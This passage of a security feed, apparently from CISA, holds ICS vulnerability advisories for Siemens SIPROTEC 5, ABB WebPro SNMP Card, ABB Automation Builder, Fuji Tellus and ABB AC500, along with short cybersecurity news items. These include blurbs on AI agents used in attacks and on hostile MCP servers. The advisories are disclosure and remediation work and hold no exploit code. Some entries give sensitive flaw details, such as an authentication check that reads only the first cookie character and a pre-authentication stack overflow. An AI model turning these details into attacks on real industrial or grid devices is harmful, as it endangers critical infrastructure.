SIPROTEC 5 7ST85 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7ST86 (CP300) vers:intdot/<11.0 (CVE-2024-54017) SIPROTEC 5 7SX82 (CP150) vers:intdot/<11.0 (CVE-2024-54017) SIPROTEC 5 7SX85 (CP300) vers:intdot/<11.0 (CVE-2024-54017) SIPROTEC 5 7SY82 (CP150) vers:intdot/<11.0 (CVE-2024-54017) SIPROTEC 5 7UM85 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7UT82 (CP100) vers:intdot/>=7.80 (CVE-2024-54017) SIPROTEC 5 7UT82 (CP150) vers:intdot/<11.0 (CVE-2024-54017) SIPROTEC 5 7UT85 (CP200) vers:all/* () SIPROTEC 5 7UT85 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7UT86 (CP200) vers:all/* () SIPROTEC 5 7UT86 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7UT87 (CP200) vers:all/* () SIPROTEC 5 7UT87 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7VE85 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7VK87 (CP200) vers:all/* () SIPROTEC 5 7VK87 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7VU85 (CP300) vers:intdot/<11.0 (CVE-2024-54017) SIPROTEC 5 Compact 7SX800 (CP050) vers:intdot/<11.0 (CVE-2024-54017) CVSS Vendor Equipment Vulnerabilities v3 5.3 Siemens Siemens SIPROTEC 5 Small Space of Random Values Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2024-54017 Affected devices do not use sufficiently random values to create session identifiers. This could allow an unauthenticated remote attacker to brute force a session identifier and gain read access to limited information from the web server without authorization. View CVE Details Affected Products Siemens SIPROTEC 5 Vendor: Siemens Product Version: SIPROTEC 5 6MD84 (CP300), SIPROTEC 5 6MD85 (CP300), SIPROTEC 5 6MD86 (CP300), SIPROTEC 5 6MD89 (CP300), SIPROTEC 5 6MU85 (CP300), SIPROTEC 5 7KE85 (CP300), SIPROTEC 5 7SA82 (CP100), SIPROTEC 5 7SA82 (CP150), SIPROTEC 5 7SA86 (CP300), SIPROTEC 5 7SA87 (CP300), SIPROTEC 5 7SD82 (CP100), SIPROTEC 5 7SD82 (CP150), SIPROTEC 5 7SD86 (CP300), SIPROTEC 5 7SD87 (CP300), SIPROTEC 5 7SJ81 (CP100), SIPROTEC 5 7SJ81 (CP150), SIPROTEC 5 7SJ82 (CP100), SIPROTEC 5 7SJ82 (CP150), SIPROTEC 5 7SJ85 (CP300), SIPROTEC 5 7SJ86 (CP300), SIPROTEC 5 7SK82 (CP100), SIPROTEC 5 7SK82 (CP150), SIPROTEC 5 7SK85 (CP300), SIPROTEC 5 7SL82 (CP100), SIPROTEC 5 7SL82 (CP150), SIPROTEC 5 7SL86 (CP300), SIPROTEC 5 7SL87 (CP300), SIPROTEC 5 7SS85 (CP300), SIPROTEC 5 7ST85 (CP300), SIPROTEC 5 7ST86 (CP300), SIPROTEC 5 7SX82 (CP150), SIPROTEC 5 7SX85 (CP300), SIPROTEC 5 7SY82 (CP150), SIPROTEC 5 7UM85 (CP300), SIPROTEC 5 7UT82 (CP100), SIPROTEC 5 7UT82 (CP150), SIPROTEC 5 7UT85 (CP300), SIPROTEC 5 7UT86 (CP300), SIPROTEC 5 7UT87 (CP300), SIPROTEC 5 7VE85 (CP300), SIPROTEC 5 7VK87 (CP300), SIPROTEC 5 7VU85 (CP300), SIPROTEC 5 Compact 7SX800 (CP050) Product Status: known_affected, known_not_affected Remediations None available Currently no fix is available Vendor fix Update to V11.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814150/ Vendor fix Update to V11.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109757433/ Vendor fix Update to V11.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109796884/ Relevant CWE: CWE-334 Small Space of Random Values Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Acknowledgments Siemens ProductCERT reported this vulnerability to CISA. SEC Consult Vulnerability Lab reported this vulnerability to Siemens. General Recommendations Operators of critical power systems (e.g. TSOs or DSOs) worldwide are usually required by regulations to build resilience into the power grids by applying multi-level redundant secondary protection schemes. It is therefore recommended that the operators check whether appropriate resilient protection measures are in place. The risk of cyber incidents impacting the grid's reliability can thus be minimized by virtue of the grid design. Siemens strongly recommends applying the provided security updates using the corresponding tooling and documented procedures made available with the product. If supported by the product, an automated means to apply the security updates across multiple product instances may be used. Siemens strongly recommends prior validation of any security update before being applied, and supervision by trained staff of the update process in the target environment. As a general security measure Siemens strongly recommends to protect network access with appropriate mechanisms (e.g. firewalls, segmentation, VPN). It is advised to configure the environment according to our operational guidelines in order to run the devices in a protected IT environment. Recommended security guidelines can be found at: https://www.siemens.com/gridsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-786884 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-786884 advisory Legal Notice and Terms of Use

Linux distros are rolling out patches for a new high-severity kernel privilege escalation vulnerability (known as Fragnasia and tracked as CVE-2026-46300) that allows attackers to run malicious code as root. [...]

West Pharmaceutical Services disclosed that it was the target of a cyberattack that resulted in data exfiltration and system encryption. [...]

The Iran-linked hacking group MuddyWater (a.k.a. Seedworm, Static Kitten) launched a broad cyber-espionage campaign targeting at least nine high-profile organizations across multiple sectors and countries. [...]

Threat actors are publishing RubyGems packages that include scrapers targeting public-facing UK government servers, but with no clear objective.

An OPSEC failure provides a window into what helped the ransomware group rise: a generous affiliate model, opportunistic TTPs, and an effective organizational structure.

A critical vulnerability affecting certain configurations of the Exim open-source mail transfer agent could be exploited by an unauthenticated remote attacker to execute arbitrary code. [...]

What would some of the world's largest repositories of malware look like if they were stacked as hard drives, one on top of the other?

A cybersecurity researcher has published proof-of-concept (PoC) exploits for two unpatched Microsoft Windows vulnerabilities named YellowKey and GreenPlasma, which are a BitLocker bypass and a privilege-escalation flaw. [...]

Tomorrow's webinar examines why prevention alone is no longer enough against modern cyberattacks. The session explores how organizations combine security, backups, and recovery planning to improve cyber resilience after attacks. [...]

The cyberthreat group targets an Azerbaijani oil and gas firm with repeated attacks, as the China-linked actors extend targeting beyond hospitality, telecom, and government sectors.

In the latest evolution of automated cyberattacks, threat actors heavily leveraged AI agents to support campaigns against entities in Mexico and Brazil.

What if the MCP server itself is the attacker? Supply chain risk in MCP tools is structural, and the postmark-mcp and ClawHub compromises made it concrete. This post pairs those case studies with otto-support's selfpwn module to show exactly what a hostile MCP server can access the moment it runs.

Foxconn, the world's largest electronics manufacturer, says some of its North American factories are now working to resume normal operations after a cyberattack. [...]

Attackers can compromise systems in minutes while patching and response still take hours or days. Picus Security breaks down why autonomous validation is becoming critical for modern defense strategies. [...]

Multiple vulnerabilities have been discovered in Fortinet products, the most severe of which could allow for remote code execution.  * FortiAuthenticator is a centralized identity and access management (IAM) solution that secures network access by managing user identities, Multi-Factor Authentication (MFA), and certificate management. * FortiSandbox is an advanced threat detection solution from Fortinet that uses sandboxing to analyze suspicious files and network traffic for advanced threats like zero-day malware and ransomware. Successful exploitation of these vulnerabilities could lead to remote code execution. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have less rights on the system could be less impacted than those who operate with administrative user rights.

Multiple vulnerabilities have been discovered in Microsoft products, the most severe of which could allow for remote code execution. Successful exploitation of the most severe of these vulnerabilities could result in an attacker gaining the same privileges as the logged-on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Multiple vulnerabilities have been discovered in Apple products, the most severe of which could allow for arbitrary code execution. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Multiple vulnerabilities have been discovered in Adobe products, the most severe of which could allow for arbitrary code execution. Adobe After Effects is a digital effects, motion graphics, and compositing application. Adobe Commerce is a composable ecommerce solution that lets you quickly create global, multi-brand B2C and B2B experiences all from one cloud-native platform. Adobe Connect is a secure, highly customizable web conferencing and virtual training platform used for webinars, online meetings, and e-learning. Adobe Media Encoder is a transcoding and rendering application that lets you deliver audio and video files in a broad variety of formats. Adobe Premiere Pro is a subscription-based timeline video editing software for film, TV, and web. Adobe Substance 3D is a suite of tools for creating 3D content, including modeling, texturing, and rendering. Content Authenticity SDK contains Rust and JavaScript libraries, enabling web pages to read, validate, create, and sign manifest data, and embed it in supported asset files. Adobe Illustrator is vector graphics software used by designers to create scalable, high-resolution artwork such as logos, icons, illustrations, and typography. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Bishop Fox is releasing Joro, a collaborative web exploitation framework built almost entirely with AI. From intercepting proxy to C2 integration, this post covers how it was built, what it does, and what AI-assisted security tool development actually looks like in practice.

View CSAF Summary ABB became aware of multiple internally discovered vulnerabilities in the WebPro SNMP card PowerValue for the product versions listed as affected in the advisory. Depending upon the vulnerability, an attacker with access to local network who successfully exploited this vulnerability could have - Unauthorized access - Insufficient Session Expiration leading to resource unavailability - Uncontrolled Resource Consumption leading to DOS attack ABB strongly advises customers to update the latest firmware of affected products. The following versions of ABB WebPro SNMP Card PowerValue Multiple Vulnerabilities are affected: WebPro SNMP Card <=1.1.8.k, 1.1.8.p CVSS Vendor Equipment Vulnerabilities v3 8.8 ABB ABB WebPro SNMP Card PowerValue Multiple Vulnerabilities Improper Check for Unusual or Exceptional Conditions, Incorrect Implementation of Authentication Algorithm, Insufficient Session Expiration Background Critical Infrastructure Sectors: Chemical, Communications, Critical Manufacturing, Dams, Energy, Healthcare and Public Health, Information Technology, Water and Wastewater Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2025-4675 Modus(slave) protocol was implemented incorrectly in the device, port 502 becomes unstable and Modbus service is unavailable until manual reboot of the device. View CVE Details Affected Products ABB WebPro SNMP Card PowerValue Multiple Vulnerabilities Vendor: ABB Product Version: ABB WebPro SNMP Card PowerValue <=1.1.8.k Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: WebPro SNMP card PowerValue version 1.1.8.p ABB advises users of the affected product versions to reach out to ABB Digital Service Support (ch.ups.digital@abb.com) for guidance and recommended actions. Additionally, ABB recommends implementing defensive measures to reduce the risk of vulnerability exploitation, as outlined in the product instruction manual. Please refer to the section “Mitigation factors” for more information. Mitigation Mitigating factors describe conditions and circumstances that make an attack that exploits the vulnerability difficult or less likely to succeed. In case customer cannot opt for not to upgrade the firmware or it is not feasible then please immediately apply mitigating factors mentioned in “General security recommendations”. Relevant CWE: CWE-754 Improper Check for Unusual or Exceptional Conditions Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:U CVE-2025-4676 Device web HMI authenticates user by validating the first character of the session cookie and authentication token. So, if only the first characters of the session cookie and token are correct, a user will be validated. An attacker can easily brute force the first character of both session cookie and bearer token. This vulnerability allows an attacker to easily bypass the authentication implemented on the device. View CVE Details Affected Products ABB WebPro SNMP Card PowerValue Multiple Vulnerabilities Vendor: ABB Product Version: ABB WebPro SNMP Card PowerValue <=1.1.8.k Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: WebPro SNMP card PowerValue version 1.1.8.p ABB advises users of the affected product versions to reach out to ABB Digital Service Support (ch.ups.digital@abb.com) for guidance and recommended actions. Additionally, ABB recommends implementing defensive measures to reduce the risk of vulnerability exploitation, as outlined in the product instruction manual. Please refer to the section “Mitigation factors” for more information. Mitigation Mitigating factors describe conditions and circumstances that make an attack that exploits the vulnerability difficult or less likely to succeed. In case customer cannot opt for not to upgrade the firmware or it is not feasible then please immediately apply mitigating factors mentioned in “General security recommendations”. Relevant CWE: CWE-303 Incorrect Implementation of Authentication Algorithm Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/E:F/RL:O/RC:U CVE-2025-4677 Idle session timeout is not configured for port 23 and 502 in device, due to which an attacker can make number of connections to the device and since device is not destroying the connections, it can lead to unavailability of the resources from the device. View CVE Details Affected Products ABB WebPro SNMP Card PowerValue Multiple Vulnerabilities Vendor: ABB Product Version: ABB WebPro SNMP Card PowerValue <=1.1.8.k Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: WebPro SNMP card PowerValue version 1.1.8.p ABB advises users of the affected product versions to reach out to ABB Digital Service Support (ch.ups.digital@abb.com) for guidance and recommended actions. Additionally, ABB recommends implementing defensive measures to reduce the risk of vulnerability exploitation, as outlined in the product instruction manual. Please refer to the section “Mitigation factors” for more information. Mitigation Mitigating factors describe conditions and circumstances that make an attack that exploits the vulnerability difficult or less likely to succeed. In case customer cannot opt for not to upgrade the firmware or it is not feasible then please immediately apply mitigating factors mentioned in “General security recommendations”. Relevant CWE: CWE-613 Insufficient Session Expiration Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:U Acknowledgments ABB PSIRT reported these vulnerabilities to CISA. Notice The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Frequently Asked Questions What causes the vulnerability? - The vulnerabilities are caused by code defects allowing the attacker to do various unintended, unauthorized actions on the target device. Please look at the description of the respective vulnerabilities in section “Vulnerability severity and details” for further details. What is WebPro SNMP Card PowerValue? - The WebPro SNMP Card PowerValue provide web server to monitor and manage multiple UPS products in networked environment. It can detect temperature and humidity for the environment via connecting to EMD (Environmental Monitoring Device). It can not only prevent data loss from power outage and safely shutdown systems but also store programming data and scheduled shut down the UPS. All UPS warning and fault event records can be kept in WebPro SNMP Card PowerValue. What might an attacker use the vulnerability to do? - If mentioned vulnerabilities have been successfully exploited by an attacker, this could allow the attacker to take control of the target WebPro SNMP Card PowerValue device. How could an attacker exploit the vulnerability? - An attacker could try to exploit the vulnerability by creating a specially crafted message and sending the message to WebPro SNMP Card PowerValue device. This would require that the attacker has access to the system network, by connecting to the network either directly or through a wrongly configured or penetrated security system. Could the vulnerability be exploited remotely? - Yes, an attacker who has network access to an affected system node could exploit this vulnerability. Recommended practices include that User’s network systems are physically protected, have no direct connections to the Internet nor any other untrusted network, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed. What does the update do? - WebPro SNMP Card PowerValue v1.1.8.p update has fixes for all the vulnerabilities mentioned in “Vulnerability severity and details” section. When this security advisory was issued, had this vulnerability been publicly disclosed? - No, the vulnerabilities have not been publicly disclosed. When this security advisory was issued, had ABB received any reports that this vulnerability was being exploited? - No, ABB had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT 2CRT000009 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-01-07 Date Revision Summary 2026-01-07 1 Initial version. 2026-05-12 2 Initial CISA Republication of ABB PSIRT 2CRT000009 advisory Legal Notice and Terms of Use

View CSAF Summary ABB became aware of severe vulnerability in the products versions listed as affected in the advisory. The Windows gateway is accessible remotely by default. Unauthenticated attackers can therefore search for PLCs, but the user management of the PLCs prevents the actual access to the PLCs – unless it is disabled The following versions of ABB Automation Builder Gateway for Windows are affected: Automation Builder <2.9.0, 2.9.0 CVSS Vendor Equipment Vulnerabilities v3 5.3 ABB ABB Automation Builder Gateway for Windows Initialization of a Resource with an Insecure Default Background Critical Infrastructure Sectors: Chemical, Critical Manufacturing, Energy, Water and Wastewater Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2024-41975 The gateway serves as a communication channel for various clients to AC500 PLCs. By default, the gateway listens on all available network adapters on port 1217 and can therefore be accessed remotely. How-ever, remote access to the gateway is only required in certain network configurations. Since the gateway is usually accessed locally, many users are unaware of this remote access option, which can enable scan-ning of and access to restricted PLC networks. Unauthenticated attackers can therefore search for PLCs, but the user management of the PLCs prevents the actual access to the PLCs – unless it is disabled. Please note that the gateway for Windows can be installed as a separate setup or as part of other setups such as the CODESYS Development System V3 setup or the CODESYS OPC DA Server setup. View CVE Details Affected Products ABB Automation Builder Gateway for Windows Vendor: ABB Product Version: ABB Automation Builder <2.9.0 Product Status: fixed, known_affected Remediations Vendor fix If remote access is not required, check the "LocalAddress" setting in the [CmpGwCommDrvTcp] section of the Gateway's configuration file as follows (restart of gateway required in case of changes): [CmpGwCommDrvTcp] LocalAddress=127.0.0.1 ; allow access only from the local computer The gateway configuration file can be located at (example for Automation Builder 2.8): %ProgramFiles%\ABB\AB2.8\AutomationBuilder\GatewayPLC\Gateway.cfg Starting with Automation Builder version 2.9.0 the vulnerability is closed by setting the default for the gateway to local access. Automation Builder 2.9.0 is available for download from the related download site. https://www.abb.com/global/en/areas/motion/digital-tools/automation-builder/software-download Workaround Workarounds are specific measures that a user can take to help block an attack, for example, temporarily disabling the vulnerable feature may remove the exposure with well-known impact on functionality. ABB has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they can help block known attack vectors. When a workaround reduces functionality, this is identified below as “Impact of workaround”. The vulnerability can be closed by enabling local access only. See chapter “Recommended immediate actions” for details. Relevant CWE: CWE-1188 Initialization of a Resource with an Insecure Default Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F/RL:O/RC:C Acknowledgments ABB PSIRT reported this vulnerability to CISA. Notice The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Frequently Asked Questions What causes the vulnerability? - Refer to section “Vulnerability severity and details“. What is the ABB Automation Builder? - The ABB Automation Builder is the programming and commissioning tool mainly for the ABB PLC AC500 and the operator panels CP600. What might an attacker use the vulnerability to do? - An attacker who successfully exploited this vulnerability could scan for connected PLCs. Could the vulnerability be exploited remotely? - Yes, an attacker who has network access to an affected system node could exploit this vulnerability. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed. What does the update do? - The update removes the vulnerability by setting the defaults of the gateway to local access. When this security advisory was issued, had this vulnerability been publicly disclosed? - Yes, this vulnerability has been publicly disclosed. When this security advisory was issued, had ABB received any reports that this vulnerability was being exploited? - No, ABB had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT 3ADR011525 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-02-24 Date Revision Summary 2026-02-24 1 Initial version. 2026-05-12 2 Initial CISA Republication of ABB PSIRT 3ADR011525 advisory Legal Notice and Terms of Use

View CSAF Summary Successful exploitation of this vulnerability could allow an attacker to elevate privileges from user to system, which may then enable the attacker to cause a temporary denial of service, open files, or delete files. The following versions of Fuji Electric Tellus are affected: Tellus 5.0.2 CVSS Vendor Equipment Vulnerabilities v3 7.8 Fuji Electric Fuji Electric Tellus Exposed Dangerous Method or Function Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Japan Vulnerabilities Expand All + CVE-2026-8108 The installation of Fuji Tellus adds a driver to the kernel which grants all users read and write permissions. View CVE Details Affected Products Fuji Electric Tellus Vendor: Fuji Electric Product Version: Fuji Electric Tellus: 5.0.2 Product Status: known_affected Remediations Vendor fix Fuji Electric recommends that Tellus be installed only with administrator privileges. Relevant CWE: CWE-749 Exposed Dangerous Method or Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Acknowledgments Kim Myung-gyu of Trend Micro Zero Day Initiative reported this vulnerability to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Initial Publication Legal Notice and Terms of Use

View CSAF Summary ABB became aware of vulnerability in the products versions listed as affected in the advisory. An update is available that resolves publicly reported vulnerability. An attacker who successfully exploited these vulnerabilities could cause a crash, denial-of-service (DoS), or potentially remote code execution. The following versions of ABB AC500 V3 Stack Buffer Overflow in Cryptographic Message Syntax are affected: AC500 V3 PM5xxx 3.9.0, 3.9.0_HF1 CVSS Vendor Equipment Vulnerabilities v3 9.8 ABB ABB AC500 V3 Stack Buffer Overflow in Cryptographic Message Syntax Out-of-bounds Write Background Critical Infrastructure Sectors: Chemical, Critical Manufacturing, Energy, Water and Wastewater Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2025-15467 When parsing CMS (Auth)EnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk. View CVE Details Affected Products ABB AC500 V3 Stack Buffer Overflow in Cryptographic Message Syntax Vendor: ABB Product Version: ABB AC500 V3 PM5xxx Firmware Version 3.9.0 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product version: - AC500 V3 firmware version 3.9.0 HF1 ABB recommends that customers apply the update at earliest convenience. This firmware version is released for all AC500 V3 PLC types and available for download from the ABB library. https://search.abb.com/library/Download.aspx?DocumentID=3ADR011537&LanguageCode=en&DocumentPartId=&Action=Launch Mitigation Refer to section “General security recommendations” for further advise on how to keep your system secure. Workaround No workarounds are available Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C Acknowledgments ABB PSIRT reported this vulnerability to CISA. Notice The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not 